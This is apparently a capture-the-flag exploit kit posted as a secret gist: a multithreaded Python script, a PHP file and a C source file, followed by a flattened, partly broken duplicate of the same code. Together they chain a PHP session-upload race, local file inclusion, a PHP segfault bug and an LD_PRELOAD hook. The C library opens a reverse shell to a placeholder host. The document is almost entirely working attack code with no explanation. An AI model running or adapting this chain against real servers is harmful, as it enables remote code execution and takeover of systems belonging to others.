as3617/ex.py Secret

## ex.py
import sys
import string
import requests
from base64 import b64encode
from random import sample, randint
from multiprocessing.dummy import Pool as ThreadPool

HOST = "http://34.131.30.75:31337/"

headers = {
    'Connection': 'Close',
    'Cookie': 'PHPSESSID=ab24'
}

headers2 = {
    'Connection': 'close',
    'Cookie': 'PHPSESSID=ab25'
}
payload = open('./exploit.php','rb').read()
path = ""

def runner1(i):

    url = "http://34.131.30.75:31337/"
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': payload
    }
    while 1:
        fp = open('./hack.so', 'rb')
        r = requests.post(HOST+'/?bonus=/var/lib/php/sessions/sess_ab24&error=1', files={'f': fp}, data=data, headers=headers)
        fp.close()
        print(r.text)

def runner2(i):
    filename = '/var/lib/php/sessions/sess_ab24'
    while 1:
        url = '%s?bonus=%s' % (HOST, filename)
        r = requests.get(url, headers=headers)
        c = r.text
        if c:
            print(c)

def runner3(i):
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': payload2
    }
    fp = open('/etc/passwd', 'rb')
    filename = '/var/lib/php/sessions/sess_ab25'
    while 1:
        url = '%s?bonus=%s' % (HOST, filename)
        r = requests.post(url, files={'f': fp}, data=data, headers=headers2)
        c = r.text
        if c:
            print(c)

if sys.argv[1] == '1':
    runner = runner1
elif sys.argv[1] == '2':
    runner = runner2
else:
    payload2 = f"""
    <?php
    putenv('LD_PRELOAD={sys.argv[2]}');mail('a','a','a','a');
    ?>
    """
    runner = runner3

pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)

## exploit.php
<?php
#https://bugs.php.net/bug.php?id=80246
#segfault -> bypass removing tmpfile
if($_GET['error']){
set_error_handler(function() use(&$my_var) {
    $my_var = 0;
});
$my_var = 'nual';
$my_var["foo"];
}
?>

## hack.c
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>

/*
gcc -c -fPIC hack.c -o hack
gcc -shared hack -o hack.so
*/

void payload() {
    struct sockaddr_in serveraddr;
        int server_sockfd;
        int client_len;
        char buf[80],rbuf[80], *cmdBuf[2]={"/bin/sh",(char *)0};

        server_sockfd = socket(AF_INET, SOCK_STREAM, 6);
        serveraddr.sin_family = AF_INET;
        serveraddr.sin_addr.s_addr = inet_addr("ip");
        serveraddr.sin_port = htons(atoi("1234"));
        client_len = sizeof(serveraddr);

        connect(server_sockfd, (struct sockaddr*)&serveraddr, client_len);

        dup2(server_sockfd, 0);
        dup2(server_sockfd, 1);
        dup2(server_sockfd, 2);

        execve("/bin/sh",cmdBuf,0);
}

uid_t getuid() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
}
	import sys
	import string
	import requests
	from base64 import b64encode
	from random import sample, randint
	from multiprocessing.dummy import Pool as ThreadPool

	HOST = "http://34.131.30.75:31337/"

	headers = {
	'Connection': 'Close',
	'Cookie': 'PHPSESSID=ab24'
	}

	headers2 = {
	'Connection': 'close',
	'Cookie': 'PHPSESSID=ab25'
	}
	payload = open('./exploit.php','rb').read()
	path = ""

	def runner1(i):

	url = "http://34.131.30.75:31337/"
	data = {
	'PHP_SESSION_UPLOAD_PROGRESS': payload
	}
	while 1:
	fp = open('./hack.so', 'rb')
	r = requests.post(HOST+'/?bonus=/var/lib/php/sessions/sess_ab24&error=1', files={'f': fp}, data=data, headers=headers)
	fp.close()
	print(r.text)

	def runner2(i):
	filename = '/var/lib/php/sessions/sess_ab24'
	while 1:
	url = '%s?bonus=%s' % (HOST, filename)
	r = requests.get(url, headers=headers)
	c = r.text
	if c:
	print(c)

	def runner3(i):
	data = {
	'PHP_SESSION_UPLOAD_PROGRESS': payload2
	}
	fp = open('/etc/passwd', 'rb')
	filename = '/var/lib/php/sessions/sess_ab25'
	while 1:
	url = '%s?bonus=%s' % (HOST, filename)
	r = requests.post(url, files={'f': fp}, data=data, headers=headers2)
	c = r.text
	if c:
	print(c)

	if sys.argv[1] == '1':
	runner = runner1
	elif sys.argv[1] == '2':
	runner = runner2
	else:
	payload2 = f"""
	<?php
	putenv('LD_PRELOAD={sys.argv[2]}');mail('a','a','a','a');
	?>
	"""
	runner = runner3

	pool = ThreadPool(32)
	result = pool.map_async( runner, range(32) ).get(0xffff)
	<?php
	#https://bugs.php.net/bug.php?id=80246
	#segfault -> bypass removing tmpfile
	if($_GET['error']){
	set_error_handler(function() use(&$my_var) {
	$my_var = 0;
	});
	$my_var = 'nual';
	$my_var["foo"];
	}
	?>
	#include <sys/socket.h>
	#include <netinet/in.h>
	#include <arpa/inet.h>
	#include <netdb.h>
	#include <unistd.h>
	#include <errno.h>

	/*
	gcc -c -fPIC hack.c -o hack
	gcc -shared hack -o hack.so
	*/

	void payload() {
	struct sockaddr_in serveraddr;
	int server_sockfd;
	int client_len;
	char buf[80],rbuf[80], cmdBuf[2]={"/bin/sh",(char )0};

	server_sockfd = socket(AF_INET, SOCK_STREAM, 6);
	serveraddr.sin_family = AF_INET;
	serveraddr.sin_addr.s_addr = inet_addr("ip");
	serveraddr.sin_port = htons(atoi("1234"));
	client_len = sizeof(serveraddr);

	connect(server_sockfd, (struct sockaddr*)&serveraddr, client_len);

	dup2(server_sockfd, 0);
	dup2(server_sockfd, 1);
	dup2(server_sockfd, 2);

	execve("/bin/sh",cmdBuf,0);
	}

	uid_t getuid() {
	if (getenv("LD_PRELOAD") == NULL) { return 0; }
	unsetenv("LD_PRELOAD");
	payload();
	}